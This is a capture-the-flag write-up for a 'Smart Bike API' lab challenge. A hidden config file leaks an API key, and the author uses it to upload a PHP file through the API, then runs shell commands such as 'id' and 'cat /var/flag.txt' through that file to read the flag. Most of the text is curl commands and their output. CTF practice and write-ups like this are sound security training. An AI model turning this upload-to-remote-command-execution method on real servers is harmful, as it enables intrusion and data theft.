After making it to the council you speak with the local IT administrators.
They are impressed with your skills and want your help in a security audit.
An exposed API endpoint could be exposing some sensitive information on the city's new Smart Bike infrastructure.
Can you take a look and see if there are any security issues that can be fixed?
Find a way to abuse the functionality of an exposed API endpoint and retrieve the flag from /var/flag.txt
The only thing we know is the exposed IP address (http://envXXX.target03:8000/).
Website contains simple text and nothing more.
SmartBike API
Checking /robots.txt
reveals hidden config file.
User-Agent: *
Disallow: /js/config.js
Checking /js/config.js
reveals application source.
/* Smart Bike API conf, only POST method allowed! */
config.apiKey= "37e4950e-d638-4e9f-9fe1-56baac1b85f2";
const api = "/api";
//default upl path
const path = "/upl";
//method list
//create -> filename + content
//delete -> location + filename (not working, permissions must be fixed)
//update -> location + filename + content (not working, permissions must be fixed)
const successCreate = "Success on file upload!";
const successDelete = "Success on file delete!";
const successUpdate = "Success on file update!";
const missingMethod = "Method is missing or disabled!";
const missingParameters = "Missing parameter(s)!";
const error = "Unknown error!"; //must be updated with status codes
const apiKey = "Provide apiKey!";
There is API key and some API methods. Basically, API is working as a upload function, which stores files in /upl
As server is running PHP (revealed by HTTP headers), idea is to upload malicious PHP file and exploit it.
Trying the API and providing necessary parameters by trial-and-error.
# curl 'http://envXXX.target03:8000/api/?apiKey=37e4950e-d638-4e9f-9fe1-56baac1b85f2' -d ''
Provide apiKey!
curl 'http://envXXX.target03:8000/api/' -d 'apiKey=37e4950e-d638-4e9f-9fe1-56baac1b85f2'
Method is missing or disabled!
# curl 'http://envXXX.target03:8000/api/' -d 'apiKey=37e4950e-d638-4e9f-9fe1-56baac1b85f2&method=create'
Missing parameter(s)!
Check for configuration...
Upload pwn.php
via API.
# curl 'http://envXXX.target03:8000/api/' -d 'apiKey=37e4950e-d638-4e9f-9fe1-56baac1b85f2&method=create&filename=pwn.php&content='
Success on file write!
Retrieving the flag.
# curl 'http://envXXX.target03:8000/upl/pwn.php' -d '1=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# curl 'http://envXXX.target03:8000/upl/pwn.php' -d '1=cat /var/flag.txt'
Flag: ctf-tech{757422a2-67e2}
Flag is ctf-tech{757422a2-67e2}